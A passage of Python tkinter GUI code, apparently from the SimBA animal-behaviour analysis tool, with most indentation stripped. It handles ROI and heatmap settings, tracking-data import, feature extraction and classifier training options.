self.secondMenu = LabelFrame(master,text="Choose bodyparts")
self.p_threshold_a = Entry_Box(self.secondMenu,'Bp probability threshold','20')
#try to see if it exist or not
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
try:
pthresh = config.get('ROI settings', 'probability_threshold')
self.p_threshold_a.entry_set(pthresh)
except:
self.p_threshold_a.entry_set(0.00)
self.disvar = IntVar()
discheckbox = Checkbutton(self.secondMenu,text='Calculate distance moved within ROI',variable=self.disvar)
runButton = Button(self.secondMenu,text=text,command =lambda:self.run_analyze_roi(noofanimal.get(), self.animalVarList[animal], appendornot))
animals2analyze = noofanimal.get()
labelFrameList, labelList, self.animalVarList, AnimalStringVarList, optionsVarList, animalBodyMenuList = [],[],[],[],[],[]
options = define_bp_drop_down(configini)
if appendornot != 'locationheatmap':
for animal in range(animals2analyze):
animalName = str(animal + 1)
labelFrameList.append(LabelFrame(self.secondMenu,text='Animal ' + animalName))
labelList.append(Label(labelFrameList[animal],text='Bodypart'))
self.animalVarList.append(StringVar())
self.animalVarList[animal].set(options[animal][0])
animalBodyMenuList.append(OptionMenu(labelFrameList[animal], self.animalVarList[animal], *options[animal]))
if appendornot == 'locationheatmap':
options = [item for sublist in options for item in sublist]
labelFrameList.append(LabelFrame(self.secondMenu,text='Animal bodypart'))
labelList.append(Label(labelFrameList[0], text='Bodypart'))
self.animalVarList.append(StringVar())
self.animalVarList[0].set(options[0])
animalBodyMenuList.append(OptionMenu(labelFrameList[0], self.animalVarList[0], *options))
#organize
self.secondMenu.grid(row=1, sticky=W)
for animal in range(animals2analyze):
labelFrameList[animal].grid(row=animal,column=0, sticky=W)
labelList[animal].grid(row=0, column=0, sticky=W)
animalBodyMenuList[animal].grid(row=animal, column=0, sticky=W)
if appendornot != 'locationheatmap':
self.p_threshold_a.grid(row=animals2analyze+1, sticky=W)
discheckbox.grid(row=animals2analyze+2, sticky=W)
runButton.grid(row=animals2analyze+3, padx=10, pady=10)
if appendornot == 'locationheatmap':
heatmapframe = Frame(self.secondMenu)
self.binsizepixels = Entry_Box(heatmapframe,'Bin size (mm)','21')
self.scalemaxsec = Entry_Box(heatmapframe,'max','21')
self.pal_var = StringVar()
paloptions = ['magma','jet','inferno','plasma','viridis','gnuplot2']
palette = OptionMenu(heatmapframe,self.pal_var,*paloptions)
self.pal_var.set(paloptions[0])
self.lastimgvar =IntVar()
lastimg = Checkbutton(heatmapframe,text='Save last image only (if unticked heatmap videos are created)',variable=self.lastimgvar)
newoptions = [item for sublist in options for item in sublist]
self.animalbody1var = StringVar()
# self.animalbody1var.set(newoptions[0])
animalbodymenu1 = OptionMenu(heatmapframe, self.animalbody1var, *newoptions)
#organize
heatmapframe.grid(row=5,sticky=W)
# animalbodymenu1.grid(row=0, column=0, sticky=W)
self.binsizepixels.grid(row=1,sticky=W)
self.scalemaxsec.grid(row=2,sticky=W)
palette.grid(row=4,sticky=W)
lastimg.grid(row=5,sticky=W)
runButton.grid(row=6, padx=10, pady=10)
def run_analyze_roi(self,noofanimal,animalVarList,appendornot):
print(animalVarList)
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
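        # Note: 'appendornot' selects the branch below: 'processmovement' writes movement settings,
        # 'locationheatmap' writes heatmap settings, 'append' appends ROI features to the feature files,
        # 'not append' runs plain ROI analysis, and 'direction' only saves the ROI settings.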
if appendornot == 'processmovement':
config.set('process movements', 'no_of_animals', str(noofanimal))
bp_vars_dist = self.animalVarList
for animal in range(noofanimal):
animalBp = str(bp_vars_dist[animal].get())
config.set('process movements', 'animal_' + str(animal+1) + '_bp', animalBp)
with open(configini, 'w') as configfile:
config.write(configfile)
elif appendornot == 'locationheatmap':
animalBp = str(animalVarList.get())
config.set('Heatmap location', 'body_part', animalBp)
config.set('Heatmap location', 'Palette', str(self.pal_var.get()))
config.set('Heatmap location', 'Scale_max_seconds', str(self.scalemaxsec.entry_get))
config.set('Heatmap location', 'bin_size_pixels', str(self.binsizepixels.entry_get))
with open(configini, 'w') as configfile:
config.write(configfile)
else:
config.set('ROI settings', 'no_of_animals', str(noofanimal))
bp_vars_ROI = self.animalVarList
for animal in range(noofanimal):
currStr = 'animal_' + str(animal+1) + '_bp'
config.set('ROI settings', currStr, str(bp_vars_ROI[animal].get()))
with open(configini, 'w') as configfile:
config.write(configfile)
if appendornot == 'append':
ROItoFeatures(configini)
elif appendornot =='not append':
if self.disvar.get()==1:
caldist = True
else:
caldist = False
#write into configini
config.set('ROI settings', 'probability_threshold', str(self.p_threshold_a.entry_get))
with open(configini, 'w') as configfile:
config.write(configfile)
roiAnalysis(configini,'outlier_corrected_movement_location',caldist)
elif appendornot == 'processmovement':
ROI_process_movement(configini)
elif appendornot == 'locationheatmap':
plotHeatMapLocation(configini,animalBp,int(self.binsizepixels.entry_get),str(self.scalemaxsec.entry_get),self.pal_var.get(),self.lastimgvar.get())
elif appendornot == 'direction':
print('ROI settings saved.')
else:
roiAnalysis(configini,'features_extracted')
def updateThreshold(self):
updateThreshold_graph(self.projectconfigini, self.csvfile.file_path, self.modelfile.file_path)
def getEntry(self):
# rectangle
recName = []
recWidth = []
recHeight = []
rec_shape = []
try:
for i in range(len(self.rect_list)):
rec_shape.append("Rectangle")
recName.append(self.rect_list[i].get())
recWidth.append(int(self.rec_width_list[i].get()))
recHeight.append(int(self.rec_height_list[i].get()))
rec_df = pd.DataFrame(list(zip(rec_shape, recName, recWidth, recHeight)), columns=['Shape_type', 'Name', 'width', 'height'])
except:
rec_df = pd.DataFrame()
# circle
cirName = []
cirRadius = []
cir_shape = []
try:
for i in range(len(self.cir_entry_list)):
cir_shape.append("Circle")
cirName.append(self.cir_entry_list[i].get())
cirRadius.append(int(self.cir_radius_list[i].get()))
cir_df = pd.DataFrame(list(zip(cir_shape, cirName, cirRadius)), columns=['Shape_type', 'Name', 'Radius'])
except:
cir_df = pd.DataFrame()
## polygon
polName = []
polShape = []
try:
for i in range(len(self.pol_list)):
polShape.append("Polygon")
polName.append(self.pol_list[i].get())
pol_df = pd.DataFrame(list(zip(polShape, polName)), columns=['Shape_type', 'Name'])
except:
pol_df = pd.DataFrame()
if not os.path.exists(os.path.join(os.path.dirname(self.projectconfigini),"logs","measures")):
os.makedirs(os.path.join(os.path.dirname(self.projectconfigini),"logs","measures"))
### to h5
storePath = os.path.join(os.path.dirname(self.projectconfigini),"logs","measures",'ROI_index.h5')
store = pd.HDFStore(storePath, mode='w')
store['rectangles'] = rec_df
store['circleDf'] = cir_df
store['polygons'] = pol_df
store.close()
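        # The shape index written above can be read back later, e.g. (sketch):
        #   pd.read_hdf(storePath, key='rectangles')   # likewise 'circleDf' and 'polygons'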
videodir = os.path.join(os.path.dirname(self.projectconfigini),'videos')
roitableMenu(videodir,self.projectconfigini)
def table(self,master,rectangle,circle,polygon):
# refresh the frames
try:
self.rectbox.destroy()
self.cirbox.destroy()
self.polbox.destroy()
except:
pass
try:
## make rectangle table
self.rectbox = LabelFrame(master)
self.rectbox.grid(row=6, sticky=W, pady=10)
self.rect_list = list(range(int(rectangle)))
self.rec_width_list = list(range(int(rectangle)))
self.rec_height_list = list(range(int(rectangle)))
            rect_w_var = list(range(int(rectangle)))
            rect_h_var = list(range(int(rectangle)))
rec_name_list = list(range(int(rectangle)))
#
rectangleName = Label(self.rectbox, text="Rectangle Name")
rectangleName.grid(row=0, column=1)
rectangleWidth = Label(self.rectbox, text="Width")
rectangleWidth.grid(row=0, column=2)
rectangleHeight = Label(self.rectbox, text="Height")
rectangleHeight.grid(row=0, column=3)
for i in range(len(self.rect_list)):
rec_name_list[i] = Label(self.rectbox, text="Rectangle " + str(i + 1))
rec_name_list[i].grid(row=int(i) + 1, padx=5, sticky=W)
self.rect_list[i] = Entry(self.rectbox)
self.rect_list[i].grid(row=int(i) + 1, column=1, padx=5)
                rect_w_var[i] = StringVar()
                self.rec_width_list[i] = Entry(self.rectbox, textvariable=rect_w_var[i])
                self.rec_width_list[i].grid(row=int(i) + 1, column=2, padx=5)
                rect_h_var[i] = StringVar()  # separate variable so the width and height entries do not mirror each other
                self.rec_height_list[i] = Entry(self.rectbox, textvariable=rect_h_var[i])
                self.rec_height_list[i].grid(row=int(i) + 1, column=3, padx=5)
                rect_w_var[i].set('0')
                rect_h_var[i].set('0')
except:
pass
try:
## make circle table
self.cirbox = LabelFrame(master)
self.cirbox.grid(row=7, sticky=W)
cir_list = list(range(int(circle)))
self.cir_entry_list = list(range(int(circle)))
self.cir_radius_list = list(range(int(circle)))
cir_var = list(range(int(circle)))
circleName = Label(self.cirbox, text="Circle Name")
circleName.grid(row=0, column=1)
radiusName = Label(self.cirbox, text='Radius')
radiusName.grid(row=0, column=2)
for i in range(len(cir_list)):
cir_list[i] = Label(self.cirbox, text=("Circle " + str(i + 1)))
cir_list[i].grid(row=int(i) + 1, padx=5, sticky=W)
self.cir_entry_list[i] = Entry(self.cirbox)
self.cir_entry_list[i].grid(row=int(i) + 1, column=1, padx=5)
cir_var[i] = StringVar()
self.cir_radius_list[i] = Entry(self.cirbox,textvariable=cir_var[i])
self.cir_radius_list[i].grid(row=int(i) + 1, column=2, padx=5)
cir_var[i].set('0')
except:
pass
try:
## make polygon table/.;p
self.polbox = LabelFrame(master)
self.polbox.grid(row=8, sticky=W)
self.pol_list = list(range(int(polygon)))
pol_name = list(range(int(polygon)))
polygonName = Label(self.polbox, text="Polygon Name")
polygonName.grid(row=0, column=1)
for i in range(len(pol_name)):
pol_name[i] = Label(self.polbox, text="Polygon " + str(i + 1))
pol_name[i].grid(row=int(i) + 1, column=0, sticky=W)
self.pol_list[i] = Entry(self.polbox)
self.pol_list[i].grid(row=int(i) + 1, column=1, padx=5)
except:
pass
setbutton = Button(master,text='Set Shape Definitions',command=self.setvariables)
setbutton.grid(row=10)
def setvariables(self):
measuresdir = os.path.join(os.path.dirname(self.projectconfigini),'logs','measures')
try:
os.remove(os.path.join(measuresdir,'ROI_definitions.h5'))
os.remove(os.path.join(measuresdir, 'ROI_index.h5'))
except:
pass
self.getEntry()
def classifiervalidation(self):
print('Generating video...')
validate_classifier(self.projectconfigini, self.seconds.entry_get,self.cvTarget.getChoices())
print('Videos generated')
def mergeframesofplot(self,var):
inputList = []
for i in var:
inputList.append(i.get())
mergeframesPlot(self.projectconfigini,inputList)
def generateSimBPlotlyFile(self,var):
inputList = []
for i in var:
inputList.append(i.get())
create_plotly_container(self.projectconfigini, inputList)
def open_web_link(self, url):
sys.excepthook = cef.ExceptHook # To shutdown all CEF processes on error
cef.Initialize()
cef.CreateBrowserSync(url=url,
window_title=url)
cef.MessageLoop()
def open_plotly_interface(self, url):
# kill any existing plotly cache
try:
self.p.kill()
self.p2.kill()
except:
print('Starting plotly')
#get h5 file path and csv file path
filePath, groupPath = self.plotly_file.file_path, self.groups_file.file_path
#print file read
if filePath.endswith('.h5'):
print('Reading in',os.path.basename(filePath))
elif groupPath.endswith('.csv'):
print('Reading in',os.path.basename(groupPath))
self.p = subprocess.Popen([sys.executable, os.path.join(os.path.dirname(__file__),'SimBA_dash_app.py'), filePath, groupPath])
# csvPath = os.path.join(os.path.dirname(self.projectconfigini),'csv')
# p = subprocess.Popen([sys.executable, r'simba\SimBA_dash_app.py', filePath, groupPath, csvPath])
wait_for_internet_connection(url)
self.p2 = subprocess.Popen([sys.executable, os.path.join(os.path.dirname(__file__),'run_dash_tkinter.py'), url])
subprocess_children = [self.p, self.p2]
atexit.register(terminate_children, subprocess_children)
def plotdataplot(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
pose_config_setting = config.get('create ensemble settings', 'pose_estimation_body_parts')
if pose_config_setting == 'user_defined':
data_plot_config(self.projectconfigini, self.SelectedBp.getChoices())
else:
data_plot_config(self.projectconfigini, 'Centroid')
def plotsklearn_result(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
plotsklearnresult(self.projectconfigini,self.videovar.get(),self.genframevar.get())
def analyzseverity(self):
analyze_process_severity(self.projectconfigini,self.severityscale.entry_get,self.severityTarget.getChoices())
def analyzedatalog(self):
# Popup window
datalogmenu = Toplevel()
datalogmenu.minsize(400, 400)
datalogmenu.wm_title("Analyze process log settings")
dlmlabel = LabelFrame(datalogmenu)
#use for loop to create intvar
var=[]
for i in range(7):
var.append(IntVar())
#use loop to create checkbox?
checkbox = [0]*7
titlebox =['# bout events', 'total events duration (s)','mean bout duration (s)', 'median bout duration (s)', 'first occurance (s)', 'mean interval (s)', 'median interval (s)']
for i in range(7):
checkbox[i] = Checkbutton(dlmlabel,text=titlebox[i],variable=var[i])
checkbox[i].grid(row=i,sticky=W)
#organize
dlmlabel.grid(row=0)
button1 = Button(dlmlabel,text='Analyze',command=lambda:self.findDatalogList(titlebox,var))
button1.grid(row=10)
def findDatalogList(self,titleBox,Var):
finallist = []
for index,i in enumerate(Var):
if i.get()==0:
finallist.append(titleBox[index])
#run analyze
analyze_process_data_log(self.projectconfigini,finallist)
def runrfmodel(self):
rfmodel(self.projectconfigini)
def modelselection(self):
runmachinemodelsettings(self.projectconfigini)
def validatemodelsinglevid(self):
validate_model_one_vid(self.projectconfigini, self.csvfile.file_path, self.modelfile.file_path, self.dis_threshold.entry_get, self.min_behaviorbout.entry_get,self.ganttvar.get())
def trainmultimodel(self):
train_multimodel(self.projectconfigini)
def trainmachinemodelsetting(self):
trainmachinemodel_settings(self.projectconfigini)
def extractfeatures(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
pose_estimation_body_parts = config.get('create ensemble settings', 'pose_estimation_body_parts')
print('Pose-estimation body part setting for feature extraction: ' + str(pose_estimation_body_parts))
userFeatureScriptStatus = self.usVar.get()
print(userFeatureScriptStatus)
if userFeatureScriptStatus == 1:
            pose_estimation_body_parts = 'user_defined_script'
import sys
script = self.scriptfile.file_path
print(script)
dir = os.path.dirname(script)
fscript = os.path.basename(script).split('.')[0]
sys.path.insert(0,dir)
import importlib
mymodule = importlib.import_module(fscript)
mymodule.extract_features_userdef(self.projectconfigini)
if userFeatureScriptStatus == 0:
if pose_estimation_body_parts == '16':
extract_features_wotarget_16(self.projectconfigini)
if (pose_estimation_body_parts == '14'):
extract_features_wotarget_14(self.projectconfigini)
if (pose_estimation_body_parts == '987'):
extract_features_wotarget_14_from_16(self.projectconfigini)
if pose_estimation_body_parts == '9':
extract_features_wotarget_9(self.projectconfigini)
if pose_estimation_body_parts == '8':
extract_features_wotarget_8(self.projectconfigini)
if pose_estimation_body_parts == '7':
extract_features_wotarget_7(self.projectconfigini)
if pose_estimation_body_parts == '4':
extract_features_wotarget_4(self.projectconfigini)
if pose_estimation_body_parts == 'user_defined':
extract_features_wotarget_user_defined(self.projectconfigini)
def importframefolder(self):
if (self.projectconfigini!='No file selected') and (self.frame_folder.folder_path != 'No folder selected'):
copy_frame_folders(self.frame_folder.folder_path, self.projectconfigini)
else:
            print('Failed to import frame folders; please select a main directory containing all the frame folders')
def importvideo_single(self):
if (self.projectconfigini != 'No file selected') and (self.singlevideopath.file_path != 'No file selected'):
copy_singlevideo_ini(self.projectconfigini, self.singlevideopath.file_path)
else:
            print('Failed to import video; please select a video to import')
def importvideo_multi(self):
if (self.projectconfigini != 'No file selected') and (self.multivideofolderpath.folder_path != 'No folder selected') and (self.video_type.entry_get != ''):
copy_multivideo_ini(self.projectconfigini, self.multivideofolderpath.folder_path,self.video_type.entry_get)
else:
            print('Failed to import videos; please select a folder with videos and enter the file format')
def importdlctracking_single(self):
if (self.projectconfigini != 'No file selected') and (self.file_csv.file_path != 'No file selected'):
copy_singlecsv_ini(self.projectconfigini, self.file_csv.file_path)
# read in configini
configFile = str(self.projectconfigini)
config = ConfigParser()
config.read(configFile)
animalIDlist = config.get('Multi animal IDs', 'id_list')
if not animalIDlist:
csvfile = os.path.join(os.path.dirname(self.projectconfigini), 'csv', 'input_csv',
os.path.basename(self.file_csv.file_path))
df = pd.read_csv(csvfile)
tmplist = []
for i in df.loc[0]:
tmplist.append(i)
if 'individuals' in tmplist:
tmplist.remove('individuals')
if len(set(tmplist)) == 1:
print('single animal using maDLC detected. Removing "individuals" row...')
df = df.iloc[1:]
df.to_csv(csvfile, index=False)
                        print('Row removed for', os.path.basename(csvfile))
else:
pass
print('Finished importing tracking data.')
else:
            print('Failed to import csv file; please select a csv file to import and load the config.ini file')
def importdlctracking_multi(self):
if (self.projectconfigini !='No file selected') and (self.folder_csv.folder_path!= 'No folder selected'):
copy_allcsv_ini(self.projectconfigini, self.folder_csv.folder_path)
# read in configini
configFile = str(self.projectconfigini)
config = ConfigParser()
config.read(configFile)
animalIDlist = config.get('Multi animal IDs', 'id_list')
if not animalIDlist:
# get all csv in project folder input csv
csvfolder = os.path.join(os.path.dirname(self.projectconfigini), 'csv', 'input_csv')
allcsvs = []
for i in os.listdir(csvfolder):
if i.endswith('.csv'):
csvfile = os.path.join(csvfolder, i)
allcsvs.append(csvfile)
# screen for madlc format but single animal
for i in allcsvs:
df = pd.read_csv(i)
tmplist = []
for j in df.loc[0]:
tmplist.append(j)
# if it is madlc
if 'individuals' in tmplist:
tmplist.remove('individuals')
# if only single animal in madlc
if len(set(tmplist)) == 1:
print('single animal using maDLC detected. Removing "individuals" row...')
df = df.iloc[1:]
df.to_csv(i, index=False)
print('Row removed for',os.path.basename(i))
else:
pass
print('Finished importing tracking data.')
else:
            print('Failed to import csv files; please select the folder with the .csv files and load the config.ini file')
def set_distancemm(self, distancemm):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('Frame settings', 'distance_mm', distancemm)
with open(configini, 'w') as configfile:
config.write(configfile)
def extract_frames_loadini(self):
configini = self.projectconfigini
videopath = os.path.join(os.path.dirname(configini), 'videos')
extract_frames_ini(videopath, configini)
def correct_outlier(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
pose_estimation_body_parts = config.get('create ensemble settings', 'pose_estimation_body_parts')
print('Pose-estimation body part setting for outlier correction: ' + str(pose_estimation_body_parts))
if (pose_estimation_body_parts == '16') or (pose_estimation_body_parts == '987'):
dev_move_16(configini)
dev_loc_16(configini)
if pose_estimation_body_parts == '14':
dev_move_14(configini)
dev_loc_14(configini)
if (pose_estimation_body_parts == 'user_defined') or (pose_estimation_body_parts == '4') or (pose_estimation_body_parts == '7') or (pose_estimation_body_parts == '8') or (pose_estimation_body_parts == '9'):
dev_move_user_defined(configini)
dev_loc_user_defined(configini)
print('Outlier correction complete.')
def distanceplotcommand(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('Distance plot', 'POI_1', self.poi1.getChoices())
config.set('Distance plot', 'POI_2', self.poi2.getChoices())
with open(configini, 'w') as configfile:
config.write(configfile)
line_plot_config(configini)
print('Distance plot complete.')
def pathplotcommand(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('Path plot settings', 'no_animal_pathplot', self.noofAnimal.getChoices())
config.set('Path plot settings', 'deque_points', self.Deque_points.entry_get)
config.set('Path plot settings', 'severity_brackets', self.severity_brackets.entry_get)
config.set('Path plot settings', 'animal_1_bp', self.Bodyparts1.getChoices())
config.set('Path plot settings', 'animal_2_bp', self.Bodyparts2.getChoices())
config.set('Path plot settings','severity_target',self.severityTargetpp.getChoices())
if self.plotsvvar.get()==1:
config.set('Path plot settings', 'plot_severity', 'yes')
else:
config.set('Path plot settings', 'plot_severity', 'no')
with open(configini, 'w') as configfile:
config.write(configfile)
path_plot_config(configini)
print('Path plot complete.')
def heatmapcommand(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('Heatmap settings', 'bin_size_pixels', self.BinSize.entry_get)
config.set('Heatmap settings', 'Scale_max_seconds', self.MaxScale.entry_get)
config.set('Heatmap settings', 'Palette', self.hmMenu.getChoices())
config.set('Heatmap settings', 'Target', self.targetMenu.getChoices())
config.set('Heatmap settings', 'body_part', self.bp1.getChoices())
with open(configini, 'w') as configfile:
config.write(configfile)
plotHeatMap(configini,self.bp1.getChoices(),int(self.BinSize.entry_get),str(self.MaxScale.entry_get)
,self.hmMenu.getChoices(), self.targetMenu.getChoices(),self.intimgvar.get() )
def callback(self,url):
webbrowser.open_new(url)
class trainmachinemodel_settings:
def __init__(self,inifile):
self.configini = str(inifile)
# Popup window
trainmmsettings = Toplevel()
trainmmsettings.minsize(400, 400)
trainmmsettings.wm_title("Machine model settings")
trainmms = Canvas(hxtScrollbar(trainmmsettings))
trainmms.pack(expand=True,fill=BOTH)
#load metadata
load_data_frame = LabelFrame(trainmms, text='Load Metadata',font=('Helvetica',10,'bold'), pady=5, padx=5)
self.load_choosedata = FileSelect(load_data_frame,'File Select',title='Select a meta (.csv) file')
load_data = Button(load_data_frame, text = 'Load', command = self.load_RFvalues,fg='blue')
#link to github
label_git_hyperparameters = Label(trainmms,text='[Click here to learn about the Hyperparameters]',cursor='hand2',fg='blue')
label_git_hyperparameters.bind('<Button-1>',lambda e: webbrowser.open_new('https://github.com/sgoldenlab/simba/blob/master/docs/tutorial.md#step-7-train-machine-model'))
#setting drop downs
label_mm = LabelFrame(trainmms, text='Machine model',font=('Helvetica',10,'bold'), pady=5, padx=5)
label_choosemm = Label(label_mm, text='Choose machine model:')
options =['RF','GBC','Xboost']
self.var = StringVar()
self.var.set(options[0]) #set as default value
modeldropdown = OptionMenu(label_mm,self.var,*options)
self.meta_dict = {}
## hyperparameter settings
label_settings = LabelFrame(trainmms, text='Hyperparameters',font=('Helvetica',10,'bold'),pady=5,padx=5)
self.settings = []
self.label_nestimators = Entry_Box(label_settings,'RF N Estimators','25')
self.label_maxfeatures = Entry_Box(label_settings,'RF Max features','25')
self.label_criterion = Entry_Box(label_settings,'RF Criterion','25')
self.label_testsize = Entry_Box(label_settings,'Train Test Size','25')
self.label_minsampleleaf = Entry_Box(label_settings,'RF Min sample leaf','25')
self.label_under_s_settings = Entry_Box(label_settings, 'Under sample setting', '25')
self.label_under_s_correctionvalue = Entry_Box(label_settings,'Under sample ratio','25')
self.label_over_s_settings = Entry_Box(label_settings, 'Over sample setting', '25')
self.label_over_s_ratio = Entry_Box(label_settings,'Over sample ratio','25')
self.settings = [self.label_nestimators, self.label_maxfeatures, self.label_criterion, self.label_testsize,
self.label_minsampleleaf, self.label_under_s_correctionvalue,self.label_under_s_settings,
self.label_over_s_ratio,self.label_over_s_settings]
## model evaluation settings for checkboxes
self.label_settings_box = LabelFrame(trainmms,pady=5,padx=5,text='Model Evaluations Settings',font=('Helvetica',10,'bold'))
self.box1 = IntVar()
self.box2 = IntVar()
self.box3 = IntVar()
self.box4 = IntVar()
self.box5 = IntVar()
self.box6 = IntVar()
self.box7 = IntVar()
self.box8 = IntVar()
self.box9 = IntVar()
self.box10 = IntVar()
# model evaluations for entrybox
self.LC_ksplit = Entry_Box(self.label_settings_box, 'LearningCurve shuffle K splits', '25',status=DISABLED)
self.LC_datasplit = Entry_Box(self.label_settings_box, 'LearningCurve shuffle Data splits', '25',status=DISABLED)
self.label_n_feature_importance_bars = Entry_Box(self.label_settings_box, 'N feature importance bars', '25',status=DISABLED)
self.shap_present = Entry_Box(self.label_settings_box,'# target present', '25',status=DISABLED)
self.shap_absent = Entry_Box(self.label_settings_box, '# target absent', '25', status=DISABLED)
self.settings.extend([self.LC_ksplit, self.LC_datasplit, self.label_n_feature_importance_bars,self.shap_present,self.shap_absent])
def activate(box, *args):
for entry in args:
if box.get() == 0:
entry.set_state(DISABLED)
elif box.get() == 1:
entry.set_state(NORMAL)
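        # 'activate' toggles the given Entry_Box widgets between DISABLED and NORMAL based on a
        # checkbox's IntVar; it is wired up via the command= lambdas on the checkbuttons below.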
checkbutton1 = Checkbutton(self.label_settings_box,text='Generate RF model meta data file',variable = self.box1)
checkbutton2 = Checkbutton(self.label_settings_box, text='Generate Example Decision Tree (requires "graphviz")', variable=self.box2)
checkbutton3 = Checkbutton(self.label_settings_box, text='Generate Fancy Example Decision Tree ("dtreeviz")', variable=self.box3)
checkbutton4 = Checkbutton(self.label_settings_box, text='Generate Classification Report', variable=self.box4)
# checkbutton5 = Checkbutton(self.label_settings_box, text='Generate Features Importance Log', variable=self.box5)
checkbutton6 = Checkbutton(self.label_settings_box, text='Generate Features Importance Bar Graph', variable=self.box6,
command = lambda:activate(self.box6, self.label_n_feature_importance_bars))
checkbutton7 = Checkbutton(self.label_settings_box, text='Compute Feature Permutation Importances (Note: CPU intensive)', variable=self.box7)
checkbutton8 = Checkbutton(self.label_settings_box, text='Generate Sklearn Learning Curves (Note: CPU intensive)', variable=self.box8,
command = lambda:activate(self.box8, self.LC_datasplit, self.LC_ksplit))
checkbutton9 = Checkbutton(self.label_settings_box, text='Generate Precision Recall Curves', variable=self.box9)
checkbutton10 = Checkbutton(self.label_settings_box,text='Calculate SHAP scores',variable=self.box10,command= lambda:activate(self.box10,self.shap_present,self.shap_absent))
self.check_settings = [checkbutton1, checkbutton2, checkbutton3, checkbutton4, checkbutton6,
checkbutton7, checkbutton8, checkbutton9, checkbutton10]
# setting drop downs for modelname
configini = self.configini
config = ConfigParser()
config.read(configini)
number_of_model = config['SML settings'].getint('No_targets')
model_list = []
count = 1
for i in range(number_of_model):
a = str('target_name_' + str(count))
model_list.append(config['SML settings'].get(a))
count += 1
labelf_modelname = LabelFrame(trainmms,text='Model',font=('Helvetica',10,'bold'),pady=5,padx=5)
label_modelname = Label(labelf_modelname,text='Model name')
self.varmodel = StringVar()
self.varmodel.set(model_list[0]) # set as default value
model_name_dropdown = OptionMenu(labelf_modelname, self.varmodel, *model_list)
# button
button_settings_to_ini = Button(trainmms, text='Save settings into global environment', font=('Helvetica', 10, 'bold'),fg='blue', command=self.set_values)
button_save_meta = Button(trainmms, text='Save settings for specific model', font=('Helvetica', 10, 'bold'),fg='green' ,command=self.save_new)
button_remove_meta = Button(trainmms,text='Clear cache',font=('Helvetica', 10, 'bold'),fg='red',command = self.clearcache)
# organize
load_data_frame.grid(row=0, sticky=W, pady=5, padx=5)
self.load_choosedata.grid(row=0, column=0, sticky=W)
load_data.grid(row=1, column=0)
label_mm.grid(row=1, sticky=W, pady=5)
label_choosemm.grid(row=0, column=0, sticky=W)
modeldropdown.grid(row=0, column=1, sticky=W)
labelf_modelname.grid(row=2, sticky=W, pady=5)
label_modelname.grid(row=0, column=0, sticky=W)
model_name_dropdown.grid(row=0, column=1, sticky=W)
label_git_hyperparameters.grid(row=3,sticky=W)
label_settings.grid(row=4, sticky=W, pady=5)
self.label_nestimators.grid(row=1, sticky=W)
self.label_maxfeatures.grid(row=2, sticky=W)
self.label_criterion.grid(row=3, sticky=W)
self.label_testsize.grid(row=4, sticky=W)
self.label_minsampleleaf.grid(row=7, sticky=W)
self.label_under_s_settings.grid(row=8, sticky=W)
self.label_under_s_correctionvalue.grid(row=9, sticky=W)
self.label_over_s_settings.grid(row=10, sticky=W)
self.label_over_s_ratio.grid(row=11,sticky=W)
self.label_settings_box.grid(row=5,sticky=W)
checkbutton1.grid(row=0,sticky=W)
checkbutton2.grid(row=1,sticky=W)
checkbutton3.grid(row=2,sticky=W)
checkbutton4.grid(row=3,sticky=W)
# checkbutton5.grid(row=4,sticky=W)
checkbutton6.grid(row=5,sticky=W)
self.label_n_feature_importance_bars.grid(row=6, sticky=W)
checkbutton7.grid(row=7,sticky=W)
checkbutton8.grid(row=8, sticky=W)
self.LC_ksplit.grid(row=9, sticky=W)
self.LC_datasplit.grid(row=10, sticky=W)
checkbutton9.grid(row=11, sticky=W)
checkbutton10.grid(row=12,sticky=W)
self.shap_present.grid(row=13,sticky=W)
self.shap_absent.grid(row=14,sticky=W)
button_settings_to_ini.grid(row=6,pady=5)
button_save_meta.grid(row=7)
button_remove_meta.grid(row=8,pady=5)
def clearcache(self):
configs_dir = os.path.join(os.path.dirname(self.configini),'configs')
filelist = [f for f in os.listdir(configs_dir) if f.endswith('.csv')]
for f in filelist:
os.remove(os.path.join(configs_dir,f))
print(f,'deleted')
def load_RFvalues(self):
metadata = pd.read_csv(str(self.load_choosedata.file_path), index_col=False)
# metadata = metadata.drop(['Feature_list'], axis=1)
for m in metadata.columns:
self.meta_dict[m] = metadata[m][0]
print('Meta data file loaded')
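        # Match meta columns to GUI fields: each column name is split on '_' and a field is filled
        # when every token appears in that field's lower-cased label text (checkboxes are matched likewise).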
for key in self.meta_dict:
cur_list = key.lower().split(sep='_')
# print(cur_list)
for i in self.settings:
string = i.lblName.cget('text').lower()
if all(map(lambda w: w in string, cur_list)):
i.entry_set(self.meta_dict[key])
for k in self.check_settings:
string = k.cget('text').lower()
if all(map(lambda w: w in string, cur_list)):
if self.meta_dict[key] == 'yes':
k.select()
elif self.meta_dict[key] == 'no':
k.deselect()
def get_checkbox(self):
### check box settings
if self.box1.get() == 1:
self.rfmetadata = 'yes'
else:
self.rfmetadata = 'no'
if self.box2.get() == 1:
self.generate_example_d_tree = 'yes'
else:
self.generate_example_d_tree = 'no'
if self.box3.get() == 1:
self.generate_example_decision_tree_fancy = 'yes'
else:
self.generate_example_decision_tree_fancy = 'no'
if self.box4.get() == 1:
self.generate_classification_report = 'yes'
else:
self.generate_classification_report = 'no'
if self.box5.get() == 1:
self.generate_features_imp_log = 'yes'
else:
self.generate_features_imp_log = 'no'
if self.box6.get() == 1:
self.generate_features_bar_graph = 'yes'
else:
self.generate_features_bar_graph = 'no'
self.n_importance = self.label_n_feature_importance_bars.entry_get
if self.box7.get() == 1:
self.compute_permutation_imp = 'yes'
else:
self.compute_permutation_imp = 'no'
if self.box8.get() == 1:
self.generate_learning_c = 'yes'
else:
self.generate_learning_c = 'no'
self.learningcurveksplit = self.LC_ksplit.entry_get
self.learningcurvedatasplit = self.LC_datasplit.entry_get
if self.box9.get() == 1:
self.generate_precision_recall_c = 'yes'
else:
self.generate_precision_recall_c = 'no'
if self.box10.get() == 1:
self.getshapscores = 'yes'
else:
